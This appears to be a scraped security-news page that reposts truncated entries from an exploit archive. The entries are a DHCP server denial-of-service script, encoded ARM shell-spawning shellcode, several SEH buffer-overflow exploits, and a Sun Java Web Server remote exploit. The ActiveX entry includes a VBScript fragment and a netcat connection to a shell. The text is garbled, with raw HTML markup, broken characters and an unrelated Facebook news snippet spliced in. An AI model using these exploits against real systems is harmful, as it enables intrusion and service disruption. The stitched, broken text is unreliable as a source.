Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ISC-DHCPD Denial of Service</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================
ISC-DHCPD Denial of Service
===========================
#! /usr/bin/env python
# Exploit title: isc-dhcpd DoS
# Date: 03/07/2010
# Author: sid
# Software Link: https://www.isc.org/software/dhcp
# Version: 4.0.x, 4.1.x, 4.2.x
# CVE: cve-2010-2156
# ps: is possible make a bruteforce on subnet ip address [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>linux/ARM – Polymorphic execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;], NULL); 78 bytes</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================================================
linux/ARM – Polymorphic execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;], NULL); – XOR 88 encoded – 78 bytes
=========================================================================================
/*
Title: Linux/ARM – Polymorphic execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;], NULL); – XOR 88 encoded – 78 bytes
Date: [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ASX to MP3 Converter v3.1.2.1 Local Buffer Overflow (SEH)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
ASX to MP3 Converter v3.1.2.1 Local Buffer Overflow (SEH)
=========================================================
# Exploit Title: ASX to MP3 Converter Version 3.1.2.1 (2010-03-30) Local
Buffer Overflow (SEH)
# Date: nhar essabt 3-7-10
# Author: MadjiX
# Software Link: [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Sun Java Web Sever 7.0 u7 Remote Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================
Sun Java Web Sever 7.0 u7 Remote Exploit
========================================
/* Sun Java Web Server Exploit
* Tested on:
* Sun Java Web Server 7.0 update 7 – XP SP3
* Ref: CVE-2010-0361
[...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>SasCam WebCam Server v2.6.5 ActiveX SEH Overwrite</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
SasCam WebCam Server v2.6.5 ActiveX SEH Overwrite
=================================================
&lt;html&gt;
&lt;object classid=’clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3′
id=’target’&gt;&lt;/object&gt;
&lt;script language = ‘vbscript’&gt;
‘SEH Overwrite exploited by Blake
‘Original EIP method by callAX
‘Tested on XP SP3/IE7 in virtualbox
‘$ nc 192.168.1.155 4444
‘Microsoft Windows XP [Version 5.1.2600]
‘(C) [...]

Facebook is updating its policies to explicitly allow a handful of third-party search engines to crawl public content.
Before, Facebook banned robots, spiders, scrapers or harvesting bots from automatically collecting data across the social networkâ??s pages, unless their creators had written permission. This raised the criticism that the social network was trying to have it both [...]